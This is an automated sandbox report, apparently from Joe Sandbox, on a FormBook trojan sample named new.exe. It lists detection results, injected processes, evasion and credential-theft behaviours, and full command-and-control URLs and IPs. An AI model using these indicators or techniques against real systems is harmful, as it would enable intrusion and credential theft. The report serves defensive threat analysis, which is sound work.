                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574502 Sample: new.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 28 www.tabyscooterrentals.xyz 2->28 30 x103.jieruitech.info 2->30 32 8 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 new.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 lxdvPfMVsD.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 cttune.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 lxdvPfMVsD.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 x103.jieruitech.info 192.197.113.112, 49908, 49918, 49925 HKKFGL-AS-APHKKwaifongGroupLimitedHK China 22->34 36 www.milp.store 194.9.94.86, 49947, 49957, 49964 LOOPIASE Sweden 22->36 38 2 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                new.exe45%ReversingLabsWin32.Trojan.AutoitInject
                new.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.tabyscooterrentals.xyz/4wxo/?Hn=lLPdJfWx2zHd-riP&6hzlp=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npN1S+mAenC5poxe7lGbUmU2Ideml9w==0%Avira URL Cloudsafe
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                http://www.vavada-official.buzz0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
                http://www.vavada-official.buzz/emhd/0%Avira URL Cloudsafe
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
                http://www.ftaane.net/8cvl/?6hzlp=7z1tMIVVCeOFn4uxK5mz1jwV68wJ7YplGsn8T3mfCMtY7lZDnOfrQMvWs9v0B15OwhJf1ztMzreoSzqDQfzwDL0bb93UG8uYJWkhP+xaRe/kLZVaBg==&Hn=lLPdJfWx2zHd-riP0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
                http://www.milp.store/2j93/?Hn=lLPdJfWx2zHd-riP&6hzlp=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt633rnN+WFzamPt7emOGov712MsYpmA==0%Avira URL Cloudsafe
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
                http://www.ftaane.net/8cvl/0%Avira URL Cloudsafe
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
                https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
                http://www.milp.store/2j93/0%Avira URL Cloudsafe
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
                https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                94950.bodis.com
                		199.59.243.227
                		truefalse
                  		high
                  x103.jieruitech.info
                  		192.197.113.112
                  		truetrue
                    		unknown
                    www.milp.store
                    		194.9.94.86
                    		truefalse
                      		unknown
                      natroredirect.natrocdn.com
                      		85.159.66.93
                      		truefalse
                        		high
                        www.ftaane.net
                        		unknown
                        		unknownfalse
                          		unknown
                          www.vavada-official.buzz
                          		unknown
                          		unknownfalse
                            		unknown
                            www.tabyscooterrentals.xyz
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.tabyscooterrentals.xyz/4wxo/?Hn=lLPdJfWx2zHd-riP&6hzlp=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npN1S+mAenC5poxe7lGbUmU2Ideml9w==false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ftaane.net/8cvl/?6hzlp=7z1tMIVVCeOFn4uxK5mz1jwV68wJ7YplGsn8T3mfCMtY7lZDnOfrQMvWs9v0B15OwhJf1ztMzreoSzqDQfzwDL0bb93UG8uYJWkhP+xaRe/kLZVaBg==&Hn=lLPdJfWx2zHd-riPtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.milp.store/2j93/?Hn=lLPdJfWx2zHd-riP&6hzlp=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt633rnN+WFzamPt7emOGov712MsYpmA==false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.vavada-official.buzz/emhd/false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ftaane.net/8cvl/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.milp.store/2j93/false
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabcttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://static.loopia.se/responsive/images/iOS-114.pngcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icocttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.vavada-official.buzzlxdvPfMVsD.exe, 0000000D.00000002.2535533484.00000000054AB000.00000040.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://static.loopia.se/responsive/images/iOS-72.pngcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.ecosia.org/newtab/cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://static.loopia.se/responsive/styles/reset.csscttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ac.ecosia.org/autocomplete?q=cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://static.loopia.se/responsive/images/iOS-57.pngcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://static.loopia.se/shared/logo/logo-loopia-white.svgcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwecttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkincttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://static.loopia.se/shared/images/additional-pages-hero-shape.webpcttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://static.loopia.se/shared/style/2022-extra-pages.csscttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                194.9.94.86
                                                		www.milp.storeSweden
                                                		39570LOOPIASEfalse
                                                192.197.113.112
                                                		x103.jieruitech.infoChina
                                                		133115HKKFGL-AS-APHKKwaifongGroupLimitedHKtrue
                                                199.59.243.227
                                                		94950.bodis.comUnited States
                                                		395082BODIS-NJUSfalse
                                                85.159.66.93
                                                		natroredirect.natrocdn.comTurkey
                                                		34619CIZGITRfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1574502
                                                Start date and time:2024-12-13 11:38:30 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 56s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:15
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:new.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@6/4
                                                EGA Information:
                                                • Successful, ratio: 66.7%
                                                HCA Information:
                                                • Successful, ratio: 94%
                                                • Number of executed functions: 51
                                                • Number of non-executed functions: 274
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50, 4.175.87.197
                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target lxdvPfMVsD.exe, PID 2540 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • VT rate limit hit for: new.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                05:40:59API Interceptor50x Sleep call for process: cttune.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                194.9.94.86PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                • www.milp.store/2j93/
                                                Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                • www.deeplungatlas.org/57zf/
                                                Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                • www.torentreprenad.com/r45o/
                                                P1 HWT623ATG.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.torentreprenad.com/r45o/
                                                BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                                                • www.xn--matfrmn-jxa4m.se/ufuh/
                                                TT-Slip.bat.exeGet hashmaliciousFormBookBrowse
                                                • www.torentreprenad.com/r45o/
                                                Doc PI.docGet hashmaliciousFormBookBrowse
                                                • www.xn--matfrmn-jxa4m.se/ufuh/
                                                Beauty_Stem_Invoice.docGet hashmaliciousFormBookBrowse
                                                • www.xn--matfrmn-jxa4m.se/ufuh/
                                                MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                • www.xn--matfrmn-jxa4m.se/ufuh/
                                                SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                • www.xn--matfrmn-jxa4m.se/ufuh/
                                                199.59.243.227PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                • www.sob.rip/tp8k/
                                                SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                • ww1.hbohbomax.com/
                                                ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                • www.deadshoy.tech/0sq9/
                                                PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                • ww7.przvgke.biz/cairvr?usid=18&utid=28672493914
                                                Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                • www.solar-quotes.click/ubu8/
                                                DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                • www.whisperart.net/27s6/
                                                QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                • www.sfantulandrei.info/wvsm/
                                                lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                • www.bcg.services/5onp/
                                                New quotation request.exeGet hashmaliciousFormBookBrowse
                                                • www.bcg.services/5onp/
                                                SRT68.exeGet hashmaliciousFormBookBrowse
                                                • www.acond-22-mvr.click/9qaj/

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                94950.bodis.comPO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                SHIPPING DOC.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                Purchase order MIPO2425110032.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                PI916810.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                Invoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                OVERDUE BALANCE.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                natroredirect.natrocdn.comPO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                rPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                SRT68.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                x103.jieruitech.infoPO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                • 192.197.113.112
                                                www.milp.storePO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                • 194.9.94.86

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                LOOPIASEPO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                • 194.9.94.86
                                                Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                • 194.9.94.86
                                                Order.exeGet hashmaliciousFormBookBrowse
                                                • 194.9.94.85
                                                SDBARVe3d3.exeGet hashmaliciousFormBookBrowse
                                                • 194.9.94.85
                                                http://tokenpuzz1le.com/Get hashmaliciousHTMLPhisherBrowse
                                                • 194.9.94.86
                                                Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                • 194.9.94.85
                                                proforma invoice.exeGet hashmaliciousFormBookBrowse
                                                • 194.9.94.85
                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                • 194.9.94.85
                                                shipping documents.exeGet hashmaliciousFormBookBrowse
                                                • 194.9.94.85
                                                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                                                • 194.9.94.85
                                                BODIS-NJUSPO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                • 199.59.243.227
                                                Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                http://doctifyblog.comGet hashmaliciousUnknownBrowse
                                                • 199.59.243.227
                                                DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                New quotation request.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                SRT68.exeGet hashmaliciousFormBookBrowse
                                                • 199.59.243.227
                                                HKKFGL-AS-APHKKwaifongGroupLimitedHK360safe.exeGet hashmaliciousUnknownBrowse
                                                • 192.197.113.45
                                                1Eo0gOdDsV.exeGet hashmaliciousQuasarBrowse
                                                • 154.83.15.5
                                                FS04dlvJrq.exeGet hashmaliciousFormBookBrowse
                                                • 192.197.113.67
                                                botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 154.221.28.71
                                                mips.elfGet hashmaliciousMiraiBrowse
                                                • 154.221.30.1
                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                • 154.221.30.6
                                                http://telegiraum.club/Get hashmaliciousTelegram PhisherBrowse
                                                • 156.236.70.154
                                                http://telegiraum.club/Get hashmaliciousTelegram PhisherBrowse
                                                • 156.236.70.154
                                                na.elfGet hashmaliciousMiraiBrowse
                                                • 194.120.230.54
                                                na.elfGet hashmaliciousMiraiBrowse
                                                • 194.120.230.54

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\--cG1-69-

                                                Download File
                                                Process:C:\Windows\SysWOW64\cttune.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                Category:dropped
                                                Size (bytes):196608
                                                Entropy (8bit):1.1211596417522893
                                                Encrypted:false
                                                SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                MD5:0AB67F0950F46216D5590A6A41A267C7
                                                SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\aut6DEF.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\new.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):288768
                                                Entropy (8bit):7.995778617826198
                                                Encrypted:true
